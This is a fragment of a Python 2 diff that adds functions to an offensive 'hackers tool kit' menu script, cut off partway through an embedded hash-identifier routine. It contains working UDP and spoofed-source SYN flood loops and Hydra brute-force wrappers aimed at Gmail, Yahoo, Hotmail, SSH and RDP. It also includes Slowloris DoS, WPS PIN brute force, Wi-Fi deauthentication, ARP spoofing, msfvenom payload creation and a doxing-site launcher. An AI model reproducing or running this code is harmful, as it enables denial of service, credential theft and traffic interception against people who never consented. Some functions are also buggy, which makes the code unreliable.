") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True +#------------------# +#SPEC INFO SCAN END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 